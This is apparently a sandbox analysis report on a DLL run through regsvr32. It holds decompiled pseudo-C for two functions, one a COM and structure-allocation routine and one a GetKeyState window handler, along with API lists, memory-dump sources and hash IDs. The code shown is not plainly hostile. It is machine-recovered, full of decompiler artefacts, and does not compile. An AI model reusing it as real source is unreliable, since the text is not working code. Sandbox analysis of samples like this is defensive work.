                                                                                                            				_t320 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
                                                                                                            				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
                                                                                                            				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
                                                                                                            				asm("movsd");
                                                                                                            				 *((char*)(_t432 - 0x3d)) = 0;
                                                                                                            				_t241 =  *((intOrPtr*)(_t432 + 8));
                                                                                                            				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                                                            				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x10040644, _t432 - 0x3c, _t402, _t416, _t319);
                                                                                                            				if(_t418 >= 0) {
                                                                                                            					_t419 = __ecx + 0x14;
                                                                                                            					__eflags =  *_t419;
                                                                                                            					 *(_t432 - 0x2c) = 0;
                                                                                                            					if( *_t419 != 0) {
                                                                                                            						 *((char*)(__ecx + 0x1c)) = 1;
                                                                                                            						goto L13;
                                                                                                            					} else {
                                                                                                            						 *(_t432 - 0x28) = 0;
                                                                                                            						_t311 =  *((intOrPtr*)(_t432 + 8));
                                                                                                            						 *(_t432 - 4) = 1;
                                                                                                            						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x10040624, _t432 - 0x28);
                                                                                                            						 *(_t432 - 0x38) = _t312;
                                                                                                            						__eflags = _t312;
                                                                                                            						_t313 =  *(_t432 - 0x28);
                                                                                                            						if(_t312 >= 0) {
                                                                                                            							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
                                                                                                            							_t419 = _t314;
                                                                                                            							__eflags = _t314;
                                                                                                            							_t315 =  *(_t432 - 0x28);
                                                                                                            							 *(_t432 - 4) = 0;
                                                                                                            							if(_t314 >= 0) {
                                                                                                            								__eflags = _t315;
                                                                                                            								 *((char*)(__ecx + 0x1c)) = 0;
                                                                                                            								if(_t315 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t315 + 8))(_t315);
                                                                                                            								}
                                                                                                            								L13:
                                                                                                            								 *(_t432 - 0x34) = 0;
                                                                                                            								 *(_t432 - 4) = 2;
                                                                                                            								 *(_t432 - 0x34) = E1001F77E(_t320[3] * 0x34);
                                                                                                            								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                                                            								__eflags =  *(_t432 - 0x34);
                                                                                                            								if( *(_t432 - 0x34) != 0) {
                                                                                                            									 *(_t432 - 4) = 4;
                                                                                                            									_t320[4] = E1001F77E(_t320[3]);
                                                                                                            									_t405 = 0;
                                                                                                            									__eflags = _t320[4];
                                                                                                            									 *(_t432 - 4) = 0;
                                                                                                            									if(__eflags != 0) {
                                                                                                            										 *(_t432 - 0x30) =  *(_t432 - 0x34);
                                                                                                            										 *(_t432 - 0x38) = 0;
                                                                                                            										while(1) {
                                                                                                            											__eflags = _t405 - _t320[3];
                                                                                                            											if(_t405 >= _t320[3]) {
                                                                                                            												break;
                                                                                                            											}
                                                                                                            											 *((char*)(_t405 + _t320[4])) = 0;
                                                                                                            											_t410 = _t405 + _t405 * 2 << 4;
                                                                                                            											_t272 = _t320[5] + _t410;
                                                                                                            											__eflags =  *(_t272 + 0x10) - _t320[9];
                                                                                                            											if( *(_t272 + 0x10) <= _t320[9]) {
                                                                                                            												L41:
                                                                                                            												_t342 =  *((intOrPtr*)(_t272 + 0x14));
                                                                                                            												__eflags = _t342 - 0xd;
                                                                                                            												if(_t342 != 0xd) {
                                                                                                            													__eflags = _t342 - 0x81;
                                                                                                            													if(_t342 == 0x81) {
                                                                                                            														_t156 = _t272 + 0x10;
                                                                                                            														 *_t156 =  *(_t272 + 0x10) + 1;
                                                                                                            														__eflags =  *_t156;
                                                                                                            													}
                                                                                                            													_t274 = _t320[5] + _t410;
                                                                                                            													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
                                                                                                            													if( *((short*)(_t274 + 0x14)) == 0x82) {
                                                                                                            														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
                                                                                                            													}
                                                                                                            													_t276 = _t320[5] + _t410;
                                                                                                            													__eflags = _t276;
                                                                                                            													 *(_t432 - 0x28) = _t276;
                                                                                                            													_t278 = E10009FD2( *(_t276 + 0x14) & 0x0000ffff);
                                                                                                            													_push(0);
                                                                                                            													goto L55;
                                                                                                            												} else {
                                                                                                            													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
                                                                                                            													 *(_t432 - 4) = 8;
                                                                                                            													 *(_t432 - 0x44) = E1001F77E(0x14);
                                                                                                            													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                                                            													__eflags =  *(_t432 - 0x44);
                                                                                                            													if( *(_t432 - 0x44) != 0) {
                                                                                                            														goto L49;
                                                                                                            													} else {
                                                                                                            														_t414 =  *(_t432 - 0x38);
                                                                                                            														__eflags = _t414;
                                                                                                            														if(__eflags > 0) {
                                                                                                            															_t427 =  *(_t432 - 0x34) + 0x14;
                                                                                                            															__eflags = _t427;
                                                                                                            															do {
                                                                                                            																_push( *_t427);
                                                                                                            																L1001F7A9(_t320, _t414, _t427, __eflags);
                                                                                                            																_t427 = _t427 + 0x34;
                                                                                                            																_t414 = _t414 - 1;
                                                                                                            																__eflags = _t414;
                                                                                                            															} while (__eflags != 0);
                                                                                                            														}
                                                                                                            														goto L47;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
                                                                                                            												if( *((short*)(_t272 + 0x14)) == 0xd) {
                                                                                                            													goto L41;
                                                                                                            												} else {
                                                                                                            													_t359 = _t320[8];
                                                                                                            													__eflags = _t359 - 2;
                                                                                                            													if(_t359 != 2) {
                                                                                                            														__eflags = _t359 - 1;
                                                                                                            														if(_t359 != 1) {
                                                                                                            															__eflags =  *((char*)(_t432 - 0x3d));
                                                                                                            															if(__eflags == 0) {
                                                                                                            																_t419 = 0;
                                                                                                            																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
                                                                                                            																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
                                                                                                            																 *(_t432 - 0x50) = 0;
                                                                                                            																 *(_t432 - 0x4c) = 0;
                                                                                                            																E1000DAA7(_t320, _t410, 0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
                                                                                                            																__eflags =  *(_t432 - 0x50);
                                                                                                            																if( *(_t432 - 0x50) == 0) {
                                                                                                            																	__eflags =  *(_t432 - 0x4c);
                                                                                                            																	if( *(_t432 - 0x4c) != 0) {
                                                                                                            																		_t419 = 0x1004079c;
                                                                                                            																		goto L32;
                                                                                                            																	}
                                                                                                            																} else {
                                                                                                            																	_t419 = 0x100407ac;
                                                                                                            																	L32:
                                                                                                            																	asm("movsd");
                                                                                                            																	asm("movsd");
                                                                                                            																	asm("movsd");
                                                                                                            																	asm("movsd");
                                                                                                            																}
                                                                                                            																 *((char*)(_t432 - 0x3d)) = 1;
                                                                                                            															}
                                                                                                            															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
                                                                                                            															 *(_t432 - 4) = 6;
                                                                                                            															 *(_t432 - 0x44) = E1001F77E(0x14);
                                                                                                            															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                                                            															__eflags =  *(_t432 - 0x44);
                                                                                                            															if( *(_t432 - 0x44) != 0) {
                                                                                                            																L49:
                                                                                                            																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
                                                                                                            																asm("movsd");
                                                                                                            																asm("movsd");
                                                                                                            																asm("movsd");
                                                                                                            																asm("movsd");
                                                                                                            																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
                                                                                                            																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
                                                                                                            																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
                                                                                                            																 *(_t432 - 0x28) = _t320[5] + _t410;
                                                                                                            																_t278 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
                                                                                                            																_push( *(_t432 - 0x44));
                                                                                                            																L55:
                                                                                                            																_t169 =  *(_t432 - 0x2c) - 1; // -1
                                                                                                            																_t419 = _t278 + _t169 &  !(_t278 - 1);
                                                                                                            																_t281 =  *(_t432 - 0x28);
                                                                                                            																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
                                                                                                            																_t390 = _t346 + 0x00000007 & 0xfffffffc;
                                                                                                            																_push(_t390);
                                                                                                            																_push(_t346);
                                                                                                            																_push(_t419);
                                                                                                            																_push(0);
                                                                                                            																 *(_t432 - 0x2c) = _t390;
                                                                                                            																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
                                                                                                            																 *(_t432 - 0x28) = _t390;
                                                                                                            																_push(0);
                                                                                                            																_push(0);
                                                                                                            																_push( *((intOrPtr*)(_t281 + 0x10)));
                                                                                                            																__eflags = 0;
                                                                                                            																_push(0);
                                                                                                            																_push( *((intOrPtr*)(_t281 + 8)));
                                                                                                            																_push( *(_t432 - 0x30));
                                                                                                            																E10009E21();
                                                                                                            																_t435 = _t435 + 0x30;
                                                                                                            																goto L56;
                                                                                                            															} else {
                                                                                                            																_t414 =  *(_t432 - 0x38);
                                                                                                            																__eflags = _t414;
                                                                                                            																if(__eflags > 0) {
                                                                                                            																	_t430 =  *(_t432 - 0x34) + 0x14;
                                                                                                            																	__eflags = _t430;
                                                                                                            																	do {
                                                                                                            																		_push( *_t430);
                                                                                                            																		L1001F7A9(_t320, _t414, _t430, __eflags);
                                                                                                            																		_t430 = _t430 + 0x34;
                                                                                                            																		_t414 = _t414 - 1;
                                                                                                            																		__eflags = _t414;
                                                                                                            																	} while (__eflags != 0);
                                                                                                            																}
                                                                                                            																L47:
                                                                                                            																_push( *(_t432 - 0x34));
                                                                                                            																L1001F7A9(_t320, _t414, _t419, __eflags);
                                                                                                            																_push(_t320[4]);
                                                                                                            																L1001F7A9(_t320, _t414, _t419, __eflags);
                                                                                                            																_t320[4] = _t320[4] & 0x00000000;
                                                                                                            																goto L15;
                                                                                                            															}
                                                                                                            														} else {
                                                                                                            															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
                                                                                                            															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
                                                                                                            															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
                                                                                                            															 *(_t432 - 0x28) = _t320[5] + _t410;
                                                                                                            															_t304 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
                                                                                                            															_t90 =  *(_t432 - 0x2c) - 1; // -1
                                                                                                            															_t419 = _t304 + _t90 &  !(_t304 - 1);
                                                                                                            															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
                                                                                                            															 *(_t432 - 0x28) = _t392;
                                                                                                            															 *(_t432 - 0x2c) = _t392 + 4;
                                                                                                            															E10009F01( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
                                                                                                            															_t435 = _t435 + 0x38;
                                                                                                            															goto L56;
                                                                                                            														}
                                                                                                            													} else {
                                                                                                            														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
                                                                                                            														_t396 = _t67 & 0xfffffffc;
                                                                                                            														 *(_t432 - 0x28) = _t396;
                                                                                                            														 *(_t432 - 0x2c) = _t396 + 4;
                                                                                                            														_t419 = 0;
                                                                                                            														E10009F01( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
                                                                                                            														_t435 = _t435 + 0x34;
                                                                                                            														L56:
                                                                                                            														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
                                                                                                            														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
                                                                                                            														 *(_t320[5] + _t410 + 4) = _t419;
                                                                                                            														_t405 =  *(_t432 - 0x38);
                                                                                                            														continue;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											goto L85;
                                                                                                            										}
                                                                                                            										__eflags =  *_t320;
                                                                                                            										if( *_t320 != 0) {
                                                                                                            											L67:
                                                                                                            											_t320[2] = _t320[2] & 0x00000000;
                                                                                                            											 *(_t432 - 4) = 0xa;
                                                                                                            											_t320[2] = E1001F77E( *(_t432 - 0x2c));
                                                                                                            											_t249 = _t320[2];
                                                                                                            											_t405 = 0;
                                                                                                            											__eflags = _t249;
                                                                                                            											 *(_t432 - 4) = 0;
                                                                                                            											if(_t249 != 0) {
                                                                                                            												E10011C50(_t249, 0,  *(_t432 - 0x2c));
                                                                                                            												_t418 = E10009DD7( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
                                                                                                            												__eflags = _t418;
                                                                                                            												if(__eflags < 0) {
                                                                                                            													_push(_t320[4]);
                                                                                                            													L1001F7A9(_t320, 0, _t418, __eflags);
                                                                                                            													_t320[4] = 0;
                                                                                                            												}
                                                                                                            												_push( *(_t432 - 0x34));
                                                                                                            												L1001F7A9(_t320, _t405, _t418, __eflags);
                                                                                                            												goto L81;
                                                                                                            											} else {
                                                                                                            												__eflags = _t320[3];
                                                                                                            												if(__eflags > 0) {
                                                                                                            													_t422 =  *(_t432 - 0x34) + 0x14;
                                                                                                            													__eflags = _t422;
                                                                                                            													do {
                                                                                                            														_push( *_t422);
                                                                                                            														L1001F7A9(_t320, _t405, _t422, __eflags);
                                                                                                            														_t405 = _t405 + 1;
                                                                                                            														_t422 = _t422 + 0x34;
                                                                                                            														__eflags = _t405 - _t320[3];
                                                                                                            													} while (__eflags < 0);
                                                                                                            													_t405 = 0;
                                                                                                            													__eflags = 0;
                                                                                                            												}
                                                                                                            												_push( *(_t432 - 0x34));
                                                                                                            												L1001F7A9(_t320, _t405, _t419, __eflags);
                                                                                                            												_push(_t320[4]);
                                                                                                            												L1001F7A9(_t320, _t405, _t419, __eflags);
                                                                                                            												_t320[4] = _t405;
                                                                                                            												goto L74;
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_push(1);
                                                                                                            											_t263 = E10009D73(_t320);
                                                                                                            											__eflags = _t263;
                                                                                                            											 *(_t432 - 0x38) = _t263;
                                                                                                            											if(_t263 >= 0) {
                                                                                                            												 *((char*)( *_t320 + 4)) = 1;
                                                                                                            												goto L67;
                                                                                                            											} else {
                                                                                                            												_t423 = 0;
                                                                                                            												__eflags = _t320[3];
                                                                                                            												if(__eflags > 0) {
                                                                                                            													_t408 =  *(_t432 - 0x34) + 0x14;
                                                                                                            													__eflags = _t408;
                                                                                                            													do {
                                                                                                            														_push( *_t408);
                                                                                                            														L1001F7A9(_t320, _t408, _t423, __eflags);
                                                                                                            														_t423 = _t423 + 1;
                                                                                                            														_t408 = _t408 + 0x34;
                                                                                                            														__eflags = _t423 - _t320[3];
                                                                                                            													} while (__eflags < 0);
                                                                                                            												}
                                                                                                            												_push( *(_t432 - 0x34));
                                                                                                            												L1001F7A9(_t320, _t405, _t423, __eflags);
                                                                                                            												_push(_t320[4]);
                                                                                                            												L1001F7A9(_t320, _t405, _t423, __eflags);
                                                                                                            												_t267 =  *(_t432 - 0x3c);
                                                                                                            												_t320[4] = _t320[4] & 0x00000000;
                                                                                                            												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            												__eflags = _t267;
                                                                                                            												goto L63;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_push( *(_t432 - 0x34));
                                                                                                            										L1001F7A9(_t320, 0, _t419, __eflags);
                                                                                                            										L74:
                                                                                                            										_t260 =  *(_t432 - 0x3c);
                                                                                                            										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            										__eflags = _t260 - _t405;
                                                                                                            										goto L75;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									L15:
                                                                                                            									_t260 =  *(_t432 - 0x3c);
                                                                                                            									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            									__eflags = _t260;
                                                                                                            									L75:
                                                                                                            									if(__eflags != 0) {
                                                                                                            										 *((intOrPtr*)( *_t260 + 8))(_t260);
                                                                                                            									}
                                                                                                            									_t254 = 0x8007000e;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								__eflags = _t315;
                                                                                                            								if(_t315 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t315 + 8))(_t315);
                                                                                                            								}
                                                                                                            								L81:
                                                                                                            								_t253 =  *(_t432 - 0x3c);
                                                                                                            								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            								__eflags = _t253 - _t405;
                                                                                                            								goto L82;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags = _t313;
                                                                                                            							 *(_t432 - 4) = 0;
                                                                                                            							if(_t313 != 0) {
                                                                                                            								 *((intOrPtr*)( *_t313 + 8))(_t313);
                                                                                                            							}
                                                                                                            							_t267 =  *(_t432 - 0x3c);
                                                                                                            							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t267;
                                                                                                            							L63:
                                                                                                            							if(__eflags != 0) {
                                                                                                            								 *((intOrPtr*)( *_t267 + 8))(_t267);
                                                                                                            							}
                                                                                                            							_t254 =  *(_t432 - 0x38);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t253 =  *(_t432 - 0x3c);
                                                                                                            					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                                                            					_t439 = _t253;
                                                                                                            					L82:
                                                                                                            					if(_t439 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t253 + 8))(_t253);
                                                                                                            					}
                                                                                                            					_t254 = _t418;
                                                                                                            				}
                                                                                                            				L85:
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
                                                                                                            				return E100117AE(_t254,  *((intOrPtr*)(_t432 - 0x14)));
                                                                                                            			}
















































                                                                                                            0x1000dbe8
                                                                                                            0x1000dbe8
                                                                                                            0x1000dbeb
                                                                                                            0x1000dbfa
                                                                                                            0x1000dbfe
                                                                                                            0x1000dc00
                                                                                                            0x1000dc03
                                                                                                            0x1000dc05
                                                                                                            0x1000dc08
                                                                                                            0x1000dc32
                                                                                                            0x1000dc35
                                                                                                            0x1000dc37
                                                                                                            0x1000dc39
                                                                                                            0x1000dc3c
                                                                                                            0x1000dc40
                                                                                                            0x1000dc55
                                                                                                            0x1000dc57
                                                                                                            0x1000dc5b
                                                                                                            0x1000dc60
                                                                                                            0x1000dc60
                                                                                                            0x1000dc69
                                                                                                            0x1000dc70
                                                                                                            0x1000dc73
                                                                                                            0x1000dc7d
                                                                                                            0x1000dc93
                                                                                                            0x1000dc97
                                                                                                            0x1000dc9b
                                                                                                            0x1000dcae
                                                                                                            0x1000dcb8
                                                                                                            0x1000dcce
                                                                                                            0x1000dcd0
                                                                                                            0x1000dcd3
                                                                                                            0x1000dcd6
                                                                                                            0x1000dce8
                                                                                                            0x1000dceb
                                                                                                            0x1000dcee
                                                                                                            0x1000dcee
                                                                                                            0x1000dcf1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000dcfa
                                                                                                            0x1000dd04
                                                                                                            0x1000dd07
                                                                                                            0x1000dd0c
                                                                                                            0x1000dd0f
                                                                                                            0x1000deaa
                                                                                                            0x1000deaa
                                                                                                            0x1000deae
                                                                                                            0x1000deb2
                                                                                                            0x1000df65
                                                                                                            0x1000df6a
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df72
                                                                                                            0x1000df74
                                                                                                            0x1000df7a
                                                                                                            0x1000df83
                                                                                                            0x1000df83
                                                                                                            0x1000df89
                                                                                                            0x1000df89
                                                                                                            0x1000df8b
                                                                                                            0x1000df93
                                                                                                            0x1000df98
                                                                                                            0x00000000
                                                                                                            0x1000deb8
                                                                                                            0x1000deb8
                                                                                                            0x1000debe
                                                                                                            0x1000dec8
                                                                                                            0x1000dede
                                                                                                            0x1000dee2
                                                                                                            0x1000dee6
                                                                                                            0x00000000
                                                                                                            0x1000dee8
                                                                                                            0x1000dee8
                                                                                                            0x1000deeb
                                                                                                            0x1000deed
                                                                                                            0x1000def2
                                                                                                            0x1000def2
                                                                                                            0x1000def5
                                                                                                            0x1000def5
                                                                                                            0x1000def7
                                                                                                            0x1000defc
                                                                                                            0x1000deff
                                                                                                            0x1000deff
                                                                                                            0x1000df00
                                                                                                            0x1000def5
                                                                                                            0x00000000
                                                                                                            0x1000deed
                                                                                                            0x1000dee6
                                                                                                            0x1000dd15
                                                                                                            0x1000dd15
                                                                                                            0x1000dd1a
                                                                                                            0x00000000
                                                                                                            0x1000dd20
                                                                                                            0x1000dd20
                                                                                                            0x1000dd23
                                                                                                            0x1000dd26
                                                                                                            0x1000dd77
                                                                                                            0x1000dd7a
                                                                                                            0x1000de07
                                                                                                            0x1000de0b
                                                                                                            0x1000de1a
                                                                                                            0x1000de1e
                                                                                                            0x1000de25
                                                                                                            0x1000de2c
                                                                                                            0x1000de2f
                                                                                                            0x1000de32
                                                                                                            0x1000de37
                                                                                                            0x1000de3a
                                                                                                            0x1000de43
                                                                                                            0x1000de46
                                                                                                            0x1000de48
                                                                                                            0x00000000
                                                                                                            0x1000de48
                                                                                                            0x1000de3c
                                                                                                            0x1000de3c
                                                                                                            0x1000de4d
                                                                                                            0x1000de50
                                                                                                            0x1000de51
                                                                                                            0x1000de52
                                                                                                            0x1000de53
                                                                                                            0x1000de53
                                                                                                            0x1000de54
                                                                                                            0x1000de54
                                                                                                            0x1000de58
                                                                                                            0x1000de5e
                                                                                                            0x1000de68
                                                                                                            0x1000de7e
                                                                                                            0x1000de82
                                                                                                            0x1000de86
                                                                                                            0x1000df23
                                                                                                            0x1000df26
                                                                                                            0x1000df2c
                                                                                                            0x1000df2d
                                                                                                            0x1000df2e
                                                                                                            0x1000df2f
                                                                                                            0x1000df39
                                                                                                            0x1000df3c
                                                                                                            0x1000df46
                                                                                                            0x1000df53
                                                                                                            0x1000df5b
                                                                                                            0x1000df60
                                                                                                            0x1000df9a
                                                                                                            0x1000df9d
                                                                                                            0x1000dfa4
                                                                                                            0x1000dfa6
                                                                                                            0x1000dfb0
                                                                                                            0x1000dfb6
                                                                                                            0x1000dfb9
                                                                                                            0x1000dfba
                                                                                                            0x1000dfc0
                                                                                                            0x1000dfc1
                                                                                                            0x1000dfc3
                                                                                                            0x1000dfc6
                                                                                                            0x1000dfca
                                                                                                            0x1000dfcd
                                                                                                            0x1000dfd3
                                                                                                            0x1000dfd4
                                                                                                            0x1000dfd7
                                                                                                            0x1000dfdd
                                                                                                            0x1000dfde
                                                                                                            0x1000dfe1
                                                                                                            0x1000dfe4
                                                                                                            0x1000dfe9
                                                                                                            0x00000000
                                                                                                            0x1000de88
                                                                                                            0x1000de88
                                                                                                            0x1000de8b
                                                                                                            0x1000de8d
                                                                                                            0x1000de92
                                                                                                            0x1000de92
                                                                                                            0x1000de95
                                                                                                            0x1000de95
                                                                                                            0x1000de97
                                                                                                            0x1000de9c
                                                                                                            0x1000de9f
                                                                                                            0x1000de9f
                                                                                                            0x1000dea0
                                                                                                            0x1000dea3
                                                                                                            0x1000df03
                                                                                                            0x1000df03
                                                                                                            0x1000df06
                                                                                                            0x1000df0b
                                                                                                            0x1000df0e
                                                                                                            0x1000df13
                                                                                                            0x00000000
                                                                                                            0x1000df18
                                                                                                            0x1000dd80
                                                                                                            0x1000dd80
                                                                                                            0x1000dd8a
                                                                                                            0x1000dd95
                                                                                                            0x1000dd9e
                                                                                                            0x1000dda6
                                                                                                            0x1000ddae
                                                                                                            0x1000ddb5
                                                                                                            0x1000ddc7
                                                                                                            0x1000ddca
                                                                                                            0x1000ddd0
                                                                                                            0x1000ddfa
                                                                                                            0x1000ddff
                                                                                                            0x00000000
                                                                                                            0x1000ddff
                                                                                                            0x1000dd28
                                                                                                            0x1000dd31
                                                                                                            0x1000dd36
                                                                                                            0x1000dd39
                                                                                                            0x1000dd3f
                                                                                                            0x1000dd49
                                                                                                            0x1000dd6a
                                                                                                            0x1000dd6f
                                                                                                            0x1000dfec
                                                                                                            0x1000dfec
                                                                                                            0x1000dff3
                                                                                                            0x1000dff6
                                                                                                            0x1000dffa
                                                                                                            0x00000000
                                                                                                            0x1000dffa
                                                                                                            0x1000dd26
                                                                                                            0x1000dd1a
                                                                                                            0x00000000
                                                                                                            0x1000dd0f
                                                                                                            0x1000e002
                                                                                                            0x1000e005
                                                                                                            0x1000e06a
                                                                                                            0x1000e06d
                                                                                                            0x1000e071
                                                                                                            0x1000e07b
                                                                                                            0x1000e091
                                                                                                            0x1000e094
                                                                                                            0x1000e096
                                                                                                            0x1000e098
                                                                                                            0x1000e09b
                                                                                                            0x1000e0ed

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 3519838083-4088798008
                                                                                                            • Opcode ID: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                                                            • Instruction ID: 1dfa92099b7bbb73699ef0bf43d1d48827835450d39971bd9aeca5f6306c0f37
                                                                                                            • Opcode Fuzzy Hash: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                                                            • Instruction Fuzzy Hash: 8412D071D04245EFEB09DFA4D884AAEBBB1EF44350F25819AF805AF296C771ED40CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1003437E(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                            				void* __ebx;
                                                                                                            				void* _t12;
                                                                                                            				signed char _t15;
                                                                                                            				void* _t20;
                                                                                                            
                                                                                                            				_t20 = __ecx;
                                                                                                            				_t15 = E100202AB(__ecx);
                                                                                                            				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000001) == 0)) {
                                                                                                            					L6:
                                                                                                            					return E10031CF0(_t20, _a4, _a8);
                                                                                                            				}
                                                                                                            				_t12 = E10023123(_t15, _t20, _a4, _a8);
                                                                                                            				if(_t12 == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}








                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetKeyState.USER32(00000073), ref: 100343A8
                                                                                                            • GetKeyState.USER32(00000012), ref: 100343B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$LongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3716621309-0
                                                                                                            • Opcode ID: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                                                            • Instruction ID: 5de781b028f8a4fce12e3c0fa49c43aff6f22c7add5c7a501000866edff81116
                                                                                                            • Opcode Fuzzy Hash: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                                                            • Instruction Fuzzy Hash: FFF02B3A20021F6EDB13AA55CC81FA93A55DF406E1F024135FD04AF252DE71EE129290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10001100() {
